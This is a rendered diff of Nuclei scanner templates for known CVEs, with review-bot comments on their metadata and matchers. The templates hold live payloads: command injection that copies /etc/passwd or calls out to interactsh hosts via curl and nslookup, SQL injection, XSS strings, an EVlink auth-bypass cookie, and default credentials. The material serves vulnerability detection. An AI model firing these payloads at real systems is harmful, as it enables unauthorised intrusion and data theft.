- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
metadata:
fofa-query: '"TerraMaster" && header="TOS"'
max-request: 2
verified: true
tags: cve,cve2020,terramaster,enum,tos
http:
- raw:
- |
GET /tos/index.php?user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /wizard/initialise.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/tos/index.php?user/login
tab=checkuser&username=admin
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "username"
- "email"
- "status"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body_2
regex:
- '"username":"(.*?)"'
- '"email":"(.*?)"'
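Review bot: `name: TerraMaster TOS < 4.2.06` and the description's `TOS <= 4.2.06` disagree on whether 4.2.06 is affected; pick one, `name: TerraMaster TOS <= 4.2.06 - User Enumeration` if the description is right. The word matcher uses `part: body` while the extractor uses `part: body_2`; the login page fetched by the first request could plausibly contain `username`, `email` and `status` as well, so `part: body_2` on the matcher keeps the decision on the `initialise.php` response that actually enumerates. A `classification` block with `cve-id: CVE-2020-28185` is also missing, which the other new templates here carry.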


@ -24,11 +24,12 @@ info:
max-request: 2
vendor: cisco
product: hyperflex_hx_data_platform
tags: cve,cve2021,cisco,rce,oast,kev,packetstorm,
tags: cve,cve2021,cisco,rce,oast,kev,packetstorm
variables:
cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"'
payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("'
useragent: '{{rand_base(6)}}'
cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"'
http:
- raw:
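Review bot: Moving `cmd` below `useragent` is not explained, and if it is an evaluation-order fix for the `{{useragent}}` reference inside `cmd`, then `payload` still references `{{cmd}}` before `cmd` is defined, so either the order does not matter (and the move is cosmetic) or `payload` needs the same move. A comment on the `variables` block, `# useragent is defined before cmd, which expands {{useragent}}`, would record the intent and stop a later tidy-up from undoing it. The trailing-comma fix in `tags` is fine on its own.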


@ -0,0 +1,40 @@
id: CVE-2021-22707
info:
name: EVlink City < R8 V3.4.0.1 - Authentication Bypass
author: ritikchaddha,dorkerdevil
severity: critical
description: |
A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
reference:
- https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
- https://nvd.nist.gov/vuln/detail/CVE-2021-22707
classification:
cve-id: CVE-2021-22707
metadata:
max-request: 1
verified: true
shodan-query: title:"EVSE web interface"
fofa-query: title="EVSE web interface"
tags: cve,cve2021,evlink,auth-bypass
http:
- raw:
- |
GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin
host-redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '?worker=Cluster" name="cluster" id="id_cluster'
- type: status
status:
- 200
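Review bot: `classification` holds only `cve-id`; the description itself names `CWE-798`, so `cwe-id: CWE-798` belongs beside it, and the sibling templates in this commit also carry `cvss-metrics`/`cvss-score`, which the NVD reference supplies. The first `reference` entry is a raw `exploit.sh` on codeberg, which may move or vanish; the vendor advisory for this CVE would be the steadier entry, with the script as a secondary link if it is kept at all.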


@ -0,0 +1,45 @@
id: CVE-2021-24409
info:
name: Prismatic < 2.8 - Cross-Site Scripting
author: Harsh
severity: medium
description: |
The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
remediation: Fixed in version 2.8
reference:
- https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
- https://nvd.nist.gov/vuln/detail/CVE-2021-24409
classification:
cve-id: CVE-2021-24409
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/prismatic"
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "Leave A Review?")'
- 'contains(body_2, "onanimationend=alert(document.domain)")'
condition: and
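Review bot: `tags: cve,cve2023,...` mislabels the year for CVE-2021-24409; the `cve-id` and every other field say 2021, so it should be `tags: cve,cve2021,wordpress,wp,wp-plugin,xss,prismatic,authenticated`. Year tags are how users select templates by tag, so this one would be skipped from a 2021 run and wrongly included in a 2023 one.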


@ -0,0 +1,43 @@
id: CVE-2021-25065
info:
name: Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting
author: Harsh
severity: medium
description: |
The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
remediation: Fixed in version 2.19.2
reference:
- https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc
- https://wordpress.org/plugins/custom-facebook-feed/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/custom-facebook-feed/"
tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<img src onerror=alert(document.domain)>")'
- 'contains(body_2, "custom-facebook-feed")'
condition: and
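Review bot: `name: ... < 4.1.1` and `remediation: Fixed in version 2.19.2` cannot both be right; the wpscan entry in `reference` is the place to confirm the fixed version and align both lines. `classification` lacks `cve-id: CVE-2021-25065`, which the sibling templates include and which ties the cvss values to the CVE.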


@ -2,7 +2,7 @@ id: CVE-2021-36260
info:
name: Hikvision IP camera/NVR - Remote Command Execution
author: pdteam,gy741
author: pdteam,gy741,johnk3r
severity: critical
description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
reference:
@ -32,20 +32,15 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language>
<?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/x)</language>
- |
GET /x HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
- "status_code_1 == 500 && status_code_2 == 200"
condition: and
extractors:
- type: regex
part: body
regex:
- "(u|g)id=.*"
- "root:.*:0:0:"
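Review bot: The payload line changes from `$(id>webLib/x)` to `$(cat /etc/passwd>webLib/x)` and the extractor regex is updated to `root:.*:0:0:`, but the visible dsl line `contains(body_2,'uid=') && contains(body_2,'gid=')` still keys on the output of `id`; if that line survives on the new side, the matcher and the extractor now look for different evidence and the match would never fire. The rendered page has lost the +/- markers, so I cannot tell with certainty which of the matcher lines were removed; if the dsl matcher was kept, change it to something consistent with the new extractor, e.g. `- "contains(body_2,'root:')"`. Writing a copy of `/etc/passwd` to the web root is also a heavier footprint on the device than the previous `id` check for what is only a detection; the lighter probe was sufficient to prove the injection. The enclosing `http` request block starts above this hunk.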


@ -0,0 +1,38 @@
id: CVE-2022-24384
info:
name: SmarterTools SmarterTrack - Cross-Site Scripting
author: E1A
severity: medium
description: |
Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.
reference:
- https://csirt.divd.nl/CVE-2022-24384
- https://csirt.divd.nl/DIVD-2021-00029
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24384
cwe-id: CWE-79
cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:*
epss-score: 0.00079
metadata:
max-request: 1
product: smartertrack
shodan-query: http.favicon.hash:1410071322
vendor: smartertools
verified: true
tags: cve,cve2022,xss,smartertrack
http:
- raw:
- |+
GET /Main/Default.aspx?viewSurveyError=Unknown+survey"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- '"type":"error","text":"Unknown survey\"><img src=x onerror=alert(document.domain)>"'
- 'smartertrack'
condition: and
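Review bot: The `description` runs two sentences together ("…SmarterTools SmarterTrack This issue affects…"); a period after "SmarterTrack" would fix it. The word matcher also lacks any content-type check, whereas the other reflected-XSS template in this commit (CVE-2023-4174) pairs the body match with a `text/html` header matcher; given the reflected value is matched in its JSON-escaped form (`\"`), confirming the response's content type would make the detection less ambiguous. Consider adding a header matcher such as `- type: word` / `part: header` / `words: ["text/html"]` under `matchers-condition: and`.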


@ -0,0 +1,46 @@
id: CVE-2022-46443
info:
name: Bangresto - SQL Injection
author: Harsh
severity: high
description: |
Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
reference:
- https://yuyudhn.github.io/CVE-2022-46443/
- https://nvd.nist.gov/vuln/detail/CVE-2022-46443
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-46443
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
tags: cve,cve2022,bangresto,sqli
variables:
num: "999999999"
http:
- raw:
- |
POST /bangresto-main/staff/process.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
- |
POST /bangresto-main/staff/insertorder.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;
itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
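Review bot: The template needs caller-supplied `{{username}}`/`{{password}}` for the first request but the `tags` line omits `authenticated`, which the other credentialed templates in this commit (CVE-2021-25065, CVE-2015-9323) include; add it so the template is filtered consistently. The `description` has a typo ("vulnberable"). The second request's `Content-Type: application/x-www-form-urlencoded;` carries a dangling semicolon with no parameter after it, and `matchers-condition: and` is a no-op with a single matcher; both can be dropped.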


@ -0,0 +1,50 @@
id: CVE-2023-26067
info:
name: Lexmark Printers - Command Injection
author: DhiyaneshDK
severity: high
description: |
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
reference:
- https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/
- https://github.com/horizon3ai/CVE-2023-26067
- https://nvd.nist.gov/vuln/detail/CVE-2023-26067
- https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf
- https://support.lexmark.com/alerts/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-26067
cwe-id: CWE-20
epss-score: 0.00145
cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: "Server: Lexmark_Web_Server"
vendor: lexmark
product: cxtpc_firmware
tags: cve,cve2023,printer,iot,lexmark
variables:
cmd: 'nslookup {{interactsh-url}}'
http:
- raw:
- |
POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Length: 49
FT_Custom_lbtrace=$({{cmd}})
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains(body, 'Fax Trace Settings')
- status_code == 200
condition: and
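Review bot: `Content-Length: 49` is hard-coded while the body `FT_Custom_lbtrace=$({{cmd}})` embeds `{{interactsh-url}}`, whose length varies per run, so the header cannot be correct in general. Nuclei normally recomputes the length for non-`unsafe` raw requests, in which case the line is dead weight; if it is honoured, the request would be truncated or rejected. Either way the `Content-Length` line should be removed. The dsl list is fine as written; the template correctly requires the DNS callback together with the `Fax Trace Settings` body marker rather than the callback alone.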


@ -0,0 +1,41 @@
id: CVE-2023-4174
info:
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
author: momika233
severity: medium
description: |
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
reference:
- https://www.exploit-db.com/exploits/51671
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
metadata:
max-request: 5
verified: true
fofa-query: icon_hash="702863115"
tags: cve,cve2023,moosocial,xss
http:
- method: GET
path:
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>ridxm"
- "mooSocial"
condition: and
- type: word
part: header
words:
- "text/html"
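Review bot: This template has no `classification` block, unlike every other CVE template in this commit; at minimum add `cve-id: CVE-2023-4174` and `cwe-id: CWE-79` so it is catalogued consistently. The `description` says the vulnerability is in "an unknown functionality", yet the template itself names the five affected endpoints (search, stores, user_info, faqs, classifieds); the description should say so rather than repeat the advisory boilerplate. `max-request: 5` with `stop-at-first-match: true` is accurate for the five paths.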


@ -0,0 +1,44 @@
id: CVE-2015-9323
info:
name: 404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
author: Harsh
severity: critical
description: |
The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
remediation: Fixed in version 2.0.3
reference:
- https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9
- http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 15s
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "404-to-301")'
condition: and
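Review bot: The `cvss-metrics` vector carries `PR:N` and `cvss-score: 9.8`, but the `name`, the `authenticated` tag and the login request all show the check requires credentials; the vector may be copied from an external source, but as written the metadata contradicts the template. The dsl lines use unsuffixed `duration`, `status_code` and `body` in a two-request raw sequence, whereas the sibling templates in this commit (CVE-2021-25065) write `status_code_2`/`body_2` explicitly; using `duration_2>=5`, `status_code_2 == 200` and `body_2` here would make it unambiguous that the second response is being evaluated. A time-based `duration>=5` check can also trip on slow targets, so keeping the `404-to-301` body marker in the `and` condition is the right call.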


@ -31,15 +31,11 @@ http:
password:
- "admin"
matchers-condition: and
redirects: true
max-redirects: 2
matchers:
- type: word
part: header
words:
- 'text/html'
- 'index.php'
- type: dsl
dsl:
- contains(body, 'bloofoxCMS Admincenter')
- status_code == 200
condition: and
- type: status
status:
- 302
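Review bot: If `redirects: true`, `max-redirects: 2` and the `302` status matcher are the removed side (the markers are lost on the rendered page), the template no longer follows the post-login redirect, so the new `contains(body, 'bloofoxCMS Admincenter') && status_code == 200` must hold on the login POST response itself. Please confirm the application returns the admin center page directly on a successful POST; if it still answers with a 302, the new matcher can never fire and the redirect settings need to be kept. The enclosing `http` request and its `payloads` start above this hunk.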


@ -0,0 +1,53 @@
id: openmediavault-default-login
info:
name: OpenMediaVault - Default Login
author: DhiyaneshDK
severity: high
reference:
- https://forum.openmediavault.org/index.php?thread/7784-default-login/
- https://soltveit.org/openmediavault-default-password/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
verified: true
shodan-query: title:"OpenMediaVault"
tags: default-login,openmediavault
http:
- raw:
- |
POST /rpc.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"service":"Session","method":"login","params":{"username":"{{username}}","password":"{{password}}"},"options":null}
attack: pitchfork
payloads:
username:
- admin
password:
- openmediavault
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"authenticated":true'
- '"permissions":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
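Review bot: `cookie-reuse: true` is a no-op on a single-request template and should be dropped. The `info` block also has no `description`, while the webmin-default-login template in this same commit provides one; a line such as `description: OpenMediaVault default login credentials were discovered.` would bring it in line. The two default-login templates added here also classify the same weakness differently (`CWE-522` here, `CWE-798` in webmin-default-login); pick one for both.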


@ -0,0 +1,61 @@
id: webmin-default-login
info:
name: Webmin - Default Login
author: pussycat0x
severity: high
description: |
Webmin default login credentials were discovered.
reference:
- https://webmin.com/
- https://doxfer.webmin.com/Webmin/Installing_Webmin
classification:
cwe-id: CWE-798
metadata:
max-request: 2
verified: true
shodan-query: title:"Webmin"
tags: webmin,default-login
http:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: redirect=1; testing=1
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
user={{username}}&pass={{password}}
- |
GET /sysinfo.cgi HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Webmin"
- "Backup Configuration Files"
- "Webmin Actions Log"
condition: and
- type: status
status:
- 200
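Review bot: `host-redirects: true` is set without a `max-redirects` cap, so the redirect chain after `session_login.cgi` is bounded only by the engine default; the other login templates in this repo pair it with `max-redirects: 2`, and adding that line here keeps the request count predictable. The long `Accept` header on the `sysinfo.cgi` request adds nothing to the detection and pushes the line well past 120 characters; it can be dropped. The `Webmin` word in the matcher is redundant with `Webmin Actions Log`, though harmless under `condition: and`.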


@ -0,0 +1,30 @@
id: acti-panel
info:
name: ACTi Video Monitoring Panel - Detection
author: DhiyaneshDk
severity: info
metadata:
max-request: 1
verified: true
fofa-query: app="ACTi-视频监控"
shodan-query: title:"Web Configurator" html:"ACTi"
tags: acti,panel,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/videoconfiguration.cgi"
matchers-condition: and
matchers:
- type: word
words:
- 'Web Configurator'
- 'ACTi'
condition: and
case-insensitive: true
- type: status
status:
- 200
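Review bot: With `case-insensitive: true`, the word `ACTi` matches the substring "acti" inside common words such as "action" or "active", and `Web Configurator` is a page title shared by other vendors' devices, so the `and` of the two is a weak fingerprint. Drop `case-insensitive: true` so `ACTi` must appear with the vendor's casing, or replace it with a longer vendor-specific token from the page; the `part` should also be stated explicitly (`part: body`) as the sibling panel templates do.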


@ -0,0 +1,28 @@
id: evlink-panel
info:
name: EVlink Local Controller - Detection
author: ritikchaddha
severity: info
metadata:
max-request: 1
verified: true
shodan-query: title:"EVlink Local Controller"
fofa-query: title="EVlink Local Controller"
tags: panel,evlink,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "EVlink Local Controller</title>"
- type: status
status:
- 200


@ -0,0 +1,32 @@
id: evse-web-panel
info:
name: EVSE Web Interface Panel - Detection
author: ritikchaddha
severity: info
metadata:
max-request: 2
verified: true
shodan-query: title:"EVSE Web Interface"
fofa-query: title="EVSE Web Interface"
tags: panel,evlink,evse,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/cgi-bin/cgiServer?worker=LoginForm"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "EVSE Web Interface</title>"
- "Charging station</title>"
condition: or
- type: status
status:
- 200
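Review bot: The `condition: or` branch `Charging station</title>` is generic enough to match any EV charger's web page, so the template will report non-EVSE products as this panel. Either drop that word and rely on `EVSE Web Interface</title>`, or anchor the second branch with a product-specific token from the `LoginForm` page. The `tags` line also carries `evlink`, which is a different product from the sibling evlink-panel template; keep it only if the EVSE interface is in fact part of the EVlink line.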


@ -18,8 +18,13 @@ http:
path:
- "{{BaseURL}}/sessions/new"
matchers-condition: and
matchers:
- type: word
words:
- "<title>SonarQube</title>"
part: body
words:
- "SonarQube"
- type: status
status:
- 200
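Review bot: Replacing the `<title>SonarQube</title>` anchor with a bare `SonarQube` body match (assuming the title line is the removed side; the rendered page lost the markers) widens the fingerprint to any page that merely mentions SonarQube, such as CI integration pages or documentation. Keep the title form, or require a second SonarQube-specific token under `condition: and`, to preserve precision. The enclosing `http` request starts above this hunk.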
